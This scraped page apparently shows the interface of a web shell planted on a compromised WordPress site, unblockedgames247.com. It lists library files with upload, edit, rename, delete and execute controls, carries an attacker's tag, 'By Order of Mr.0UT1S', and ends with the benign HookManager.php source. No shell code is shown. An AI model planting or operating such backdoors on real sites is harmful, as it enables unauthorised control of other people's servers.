home
/
aioutajg
/
unblockedgames247.com
/
wp-includes
/
Requests
/
src
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] Auth
N/A
[DIR] Cookie
N/A
[DIR] Exception
N/A
[DIR] Proxy
N/A
[DIR] Response
N/A
[DIR] Transport
N/A
[DIR] Utility
N/A
Auth.php
860 bytes
Rename
Delete
Autoload.php
9.12 KB
Rename
Delete
Capability.php
652 bytes
Rename
Delete
Cookie.php
15.03 KB
Rename
Delete
Exception.php
1.09 KB
Rename
Delete
HookManager.php
709 bytes
Rename
Delete
Hooks.php
2.96 KB
Rename
Delete
IdnaEncoder.php
12.14 KB
Rename
Delete
Ipv6.php
5.51 KB
Rename
Delete
Iri.php
28.93 KB
Rename
Delete
Port.php
1.47 KB
Rename
Delete
Proxy.php
867 bytes
Rename
Delete
Requests.php
33.20 KB
Rename
Delete
Response.php
4.18 KB
Rename
Delete
Session.php
8.89 KB
Rename
Delete
Ssl.php
5.30 KB
Rename
Delete
Transport.php
1.51 KB
Rename
Delete
error_log
306 bytes
Rename
Delete
<?php /** * Event dispatcher * * @package Requests\EventDispatcher */ namespace WpOrg\Requests; /** * Event dispatcher * * @package Requests\EventDispatcher */ interface HookManager { /** * Register a callback for a hook * * @param string $hook Hook name * @param callable $callback Function/method to call on event * @param int $priority Priority number. <0 is executed earlier, >0 is executed later */ public function register($hook, $callback, $priority = 0); /** * Dispatch a message * * @param string $hook Hook name * @param array $parameters Parameters to pass to callbacks * @return boolean Successfulness */ public function dispatch($hook, $parameters = []); }
Save